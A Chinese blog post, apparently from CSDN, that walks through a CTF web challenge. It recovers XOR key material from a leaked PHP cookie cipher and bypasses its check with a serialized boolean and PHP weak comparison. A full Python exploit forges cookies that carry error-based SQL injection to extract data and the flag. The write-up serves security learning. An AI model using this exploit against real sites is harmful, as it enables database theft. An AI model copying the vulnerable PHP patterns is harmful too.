一个SQL注入绕过分析(来源swpu web700)

最新推荐文章于 2024-05-16 02:47:32 发布
最新推荐文章于 2024-05-16 02:47:32 发布
阅读量3.3k 收藏
点赞数 1
分类专栏: CTF学习 文章标签: sql注入 算法分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gwenchill/article/details/49538683
版权

访问页面提示:Hello Guest! please use in Admin!
查看cookie是user=DWJ6Ti0bEyhVIwsrK09/G3gSWygIfAJ9QjR2VFk2TjpMeAM4OAYHJFU/ASdRanFVRWEEd0hzBnJxSUl6BmhNaA1oehEtUBMwVWMLKytPfxt4GlswCCoCMkIkdhNZNU54THYDbzgFB2BVbwE0UW1xR0UkBGJIcAZlcUFJLwYxTXgNNXpELR4TdlVsC20rEH8feB9bPgg
+AidCe3YLWTROfkx1AzQ=
每刷新一次变化一次
扫描发现index.php.bak得到源代码:

<?php 
include('config.php');
function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++)  {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}
function encrypt($txt, $key) {
    $key =md5($key);
    $rnd = random(32);
    $_txt['txt'] =$txt;
    $_txt['key'] = md5(substr($key,0,strlen($txt)));
    $txt = serialize($_txt);
    $txt = $txt.substr($key, 0, 4);
    $len = strlen($txt);
    $ctr = 0;
    $str = '';
    for($i = 0; $i < $len; $i++) {
        $ctr = $ctr == 32 ? 0 : $ctr;
        $str .= $rnd[$ctr].($txt[$i] ^ $rnd[$ctr++]);
    }
    return base64_encode(kecrypt($str, $key));
}

function decrypt($txt, $key) {
    $key =md5($key);
    $txt = kecrypt(base64_decode($txt), $key);
    $len = strlen($txt);
    $str = '';
    for($i = 0; $i < $len; $i++) {
        $tmp = $txt[$i];
        $str .= $txt[++$i] ^ $tmp;
    }
    $_txt = unserialize(substr($str, 0, -4));
    $_key = md5(substr($key,0,strlen($_txt['txt'])));
    return substr($str, -4) == substr($key, 0, 4) && $_key == $_txt['key'] ? $_txt['txt'] : '';
}


function kecrypt($txt, $key) {
    $len = strlen($txt);
    $ctr = 0;
    $str = '';
    for($i = 0; $i < $len; $i++) {
        $ctr = $ctr == 32 ? 0 : $ctr;
        $str .= $txt[$i] ^ $key[$ctr++];
    }
    return $str;
}

$username = decrypt($_COOKIE['user'],$key);
$query = mysql_query("select password from manager where username='".$username."'");
if(!$query)
{
    die(mysql_error());
}
$con=mysql_fetch_row($query);
if ($con[0] === decrypt($_COOKIE['pass'],$key)) {


}else{
    setcookie('user',encrypt('guest',$key));
    echo "Hello Guest! please use in Admin!";
}
?>

分析源代码发现加密过程挺复杂的,key未知,md5,32位随机值,serialize,感觉无法破解的样子。搜索关键字发现乌云文章《Destoon B2B 2014-05-21最新版绕过全局防御暴力注入》,其思路是爆破microtime值,这里生成了32位随机值,不可能爆破。
后又找到乌云文章: DedeCMS-V5.7-SP1(2014-07-25)sql注入+新绕过思路(http://www.wooyun.org/bugs/wooyun-2010-071655)很有借鉴意义。

根据代码:

$username = decrypt($_COOKIE['user'],$key);
$query = mysql_query("select password from manager where username='".$username."'");
if(!$query)
{
    die(mysql_error());
}

username是从传入的cookie参数user值解密得到的,可以通过报错注入得到数据库数据。关键是如何构造加密的user值,里面包括要注入的内容。

查看decrypt函数:
key是原始key的md5值,固定为32位。
kecrypt(base64_decode( txt), key) 将密文进行base64解密后,与key每一位循环异或。
设base64_decode(密文)=ABCDEFG…
明文为:abcdefg…
kecrypt函数得到:text=A^key[0],B^key[1]…
再将txt的相邻两位text[i]^text[i+1]得到明文
故a=text[0]^text[1]=A^key[0]^B^key[1]
因此得到key[0]^key[1]=A^B^a,只要求出key[0]^key[1],…key[30]^key[31]这16个数就够了。
然后加密方法为:A随便取各字符,求B就可以了,B=(key[0]^key[1])^A^a
解密方法为:a=(A^B)^(key[0]^key[1]),明文长度固定为密文长度的一半

根据加密函数:

$_txt['txt'] =$txt;
$_txt['key'] = md5(substr($key,0,strlen($txt)));
$txt = serialize($_txt);

serialize后明文类似
a:2:{s:3:"txt";s:5:"guest";s:3:"key";s:32:"7de814b9f7fba178d2fc2607d45e7746";}9779
前面的字符a:2:{s:3:”txt”;s:5:”guest”;s:3:”key”;s:32:”都是固定的,这里只需要16个字符就够了,可以求出key[i]^key[i+1]的值

解密后的明文要满足两个条件:

substr($str, -4) == substr($key, 0, 4) && $_key == $_txt['key']

关于第一个条件,任意密文解密得到明文就可以得到后面的4个字符,就是key的md5值的最前面4个字符,这个值是固定的,值为9779.
关于第二个条件,_key是key的md5再根据明文长度截取再求md5,基本不可能破解的,但这里php有个弱类型比较问题,任意不为0或空的字符串或数字均可以等于True,因为serialize可以构造boolean类型,因此需要构造的明文类似:a:2:{s:3:”txt”;s:5:”guest”;s:3:”key”;b:1;}9779,注入语句在guest位置,前面的s:5对应字符串长度,需要修改。

然后再执行加密,解密,注入就水到渠成了。
poc with python2如下:

import base64
import requests

"""Refer to the encrypt and decrpt method, cliper[i]^cliper[i+1]^raw[i/2]=key[i]^key[i+1],keys is stable"""
def getkey():
    cliper="XDNPezAGFS57DUhoD2tTN08lbh10AHwDew1AYkEuBXEOOmRfJRtWdQ9lW30LMEBkbEhCMVRvVSFtVWladhhFYFw5TyQwTRU2e01IaA9rUzdPLW4FdFZ8THsdQCVBLQUzDjRkCCUYVjEPNVtuCzdAdmwNQiRUbFU2bV1pD3ZBRXBcZE9xMAMVcHtCSC4PNFMzTyhuC3RCfFl7QkA9QSwFNQ43ZFM="
    raw="a:2:{s:3:\"txt\";s:5:\"guest\";s:3:\"key\";s:32:\"d748530a5d6d860bf4596d6924e1548b\";}81dc"
    cliper=base64.b64decode(cliper)
    keys=[]
    rawx=raw[:16]
    cliperx=cliper[:32]
    for i,c in enumerate(rawx):
        keys.append(ord(cliperx[2*i])^ord(cliperx[2*i+1])^ord(c))

    return keys

"""get the last 4 character of text: 9779"""
def testdecode(keys):
    cliper="WjVuWlJkLBd9C35eB2NTN0YsTD9kEGAfUCZWdF0yeg5wRFNoW2UyEWELByEFPnNXZ0NjEH9EWi5gWGNQWjRAZVo/bgVSLywPfUt+XgdjUzdGJEwnZEZgUFA2VjNdMXpMcEpTP1tmMlVhWwcyBTlzRWcGYwV/R1o5YFBjBVptQHVaYm5QUmEsSX1EfhgHPFMzRiFMKWRSYEVQaVYrXTB6SnBJU2Q="
    cliper=base64.b64decode(cliper)
    j=0
    text=''
    for i in xrange(0,len(cliper),2):
        text+=chr(keys[j]^ord(cliper[i])^ord(cliper[i+1]))
        j+=1
        if(j==16):
            j=0

    print text

def encode(inject,keys):
    injectstr="a' and extractvalue(1,concat(0x23,(%s)))-- "%(inject)
    str="""a:2:{s:3:"txt";s:%d:"%s";s:3:"key";b:1;}9779"""%(len(injectstr),injectstr)
    #print str
    c2='a'
    j=0
    res=''
    for i in xrange(0,len(str)):
        res+=c2+chr(keys[j]^ord(str[i])^ord(c2))
        j+=1
        if(j==16):
            j=0

    return base64.b64encode(res).replace("=","%3D")

def sendtext(encodestr):
    url="http://web6.wllm.club/index.php"
    cookie={'user':encodestr}
    x=requests.get(url,cookies=cookie)
    print x.content

keys=getkey()
testdecode(keys)

sql="concat(user(),0x23,version(),0x23,database())"
sendtext(encode(sql,keys))

sql="select table_name from information_schema.tables where table_schema=database() limit 0,1"
sendtext(encode(sql,keys))

sql="select * from flag"
sendtext(encode(sql,keys))
gwenchill
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入的一般方法总结(含WAF绕过) ctf
NLost
03-20 6830
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器 上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 下面分享几种常见的SQL注入常见绕过方法:以下以 **index.php?id=1** 为例绕过
CTF-命令注入【超详细】
不知名白帽的博客
09-05 9143
CTF-命令注入【超详细】
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84968222的博客
05-16 786
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
CTF-SQL注入
weixin_44770698的博客
06-16 5031
CTF-SQL注入题目整理
CTF_WEB学习-------------RCE之命令注入
qq_45616570的博客
07-14 2925
CTF_WEB学习-------------RCE之命令注入 REC 什么是RCE? ​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。 RCE产生的原因? ​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。 RCE漏洞分类 命令注入 文件包含 eval执行 命令注入 什么是命令注入? ​ 命令注入就是通过控
CTF模板注入
weixin_43952190的博客
07-30 4190
模板注入赛题 1. [护网杯 2018]easy_tornado 进入后三个链接 /flag.txt # flag in /fllllllllllllag /welcome.txt #提示render(渲染) /hint.txt #提示md5(cookie_secret+md5(filename)) url上两个参数:filename&filehash 根据提示,要查看flag,已经知道了文件名,filehash也知道了构
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
SWPU校园网络维护管理信息系统分析与设计.doc
06-17
SWPU校园网络维护工作是由SWPU网络与信息化学生维护团队负责,校园网络维护是学校正常运行的重要保障之一。近年来,随着学校信息化进程的不断推进,校园网络的稳定运行越来越重要,传统的手工记录已经不能满足现在的...
SWPU大数据概论课程报告
01-31
例如,报告可能会详细解析一个或多个大数据应用案例,如电商推荐系统、社交媒体分析或者智慧城市等,通过实际场景帮助读者理解大数据的实际运用。 文件名称“DaShuJuGaiLun”可能指的是报告的具体章节或者部分,如...
[SWPUCTF 2021 新生赛]traditional
03-15
3. 八卦图:八卦图是中国古典哲学中的一个概念,它可以用来表示二进制数字。 4. 加密和解密:八卦图密码可以用来加密和解密信息,它可以将信息转换为二进制数字,然后将其转换为 ASCII 码。 5. 计算机科学:八卦图...
php绕过refer,GET请求Referer限制绕过总结
weixin_35679869的博客
03-20 853
前言在做测试的时候会遇见这样几个漏洞场景:JSONP跨域劫持反射XSSGET请求类型攻击但是,在相对安全的情况下,都会有Referer(HTTP请求头)的限制。那么该如何去做绕过呢?正文什么是Referer?Referer是请求头的一部分,假设A站上有B站的链接,在A站上点击B站的链接,请求头会带有Referer,而Referer的值为A站的链接;这也就是为什么上文所说的场景,遇见了Referer...
熊海CMS网站SQL注入、XSS攻击、cookie篡改
m0_63917373的博客
11-01 1843
熊海CMS sqlmap工具 SQL注入 XSS cookie篡改
正则表达式以及相关案例绕过复现
CYLK1987310466的博客
07-23 514
正则表达式的学习
CTF-命令注入
不知名白帽的博客
05-28 1056
CTF-命令注入,实验环境:(192.168.20.128),靶机(192.168.20.141)。通过信息探测,深入挖掘隐藏信息,获取账号和密码,用searchsploit搜寻漏洞,再用msfconsole进行监听,然后用base64绕过防火墙,生成sehll,上传shell,反弹shell...
ctf sql注入关键词绕过【积累中】
热门推荐
Sp4rkW的博客
09-25 2万+
写在前面:这个博客知识点来源于个人ctf练习比赛中积累的知识点及网络中各个博客的总结点,这里做测试和记录 0x00 sql注入理解 SQL注入能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 SQL是结构化查询语言的简称,它是访问数据库的事实标准。目前,大多数Web应用都使用SQL数据库来存放应用程序的数据。几乎所有的Web应用在后台 都使用某种SQL数据库。跟大多数语言一...
高级SQL注入:混淆和绕过
kezhen的专栏
08-11 1902
#############  【0×00】 – 简介  【0×01】 – 过滤规避(Mysql)  【0x01a】 – 绕过函数和关键词的过滤  【0x01b】 – 绕过正则表达式过滤  【0×02】 – 常见绕过技术  【0×03】 – 高级绕过技术  【0x03a】 – HTTP参数污染:分离与结合  【0x03b】 – HTTP参数参杂  【0×04】 – 如何保护你的
绕过正则表达式例子
weixin_52159400的博客
07-19 335
例如/select\b[\s\S]*\bfrom/绕过该类型正则表达式时可采用科学计数法的方式进行绕过。将搜索栏中第二个select删去即可实现。第一行为用户名,第二行为吗,密码第三行为1e1的值。1,当我们查询某数据库信息时,注入失败sqlinjection,被正则表达式所限制。由上图可知成功查询到user表中的数据,且mysql也支持该关键词的实现。但当我们查询数据库用户和密码绕过正则后提示查询范围超出。绕过语句select\b[\s\S]*\b。...
Swpu19年web前端开发
04-24
Web前端开发领域有许多新技术和趋势,其中一些包括React,Vue.js,Angular,GraphQL,TypeScript,WebAssembly和PWA等。这些技术和趋势可以帮助开发人员更高效地构建可扩展的Web应用程序,并提高用户体验。另外,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值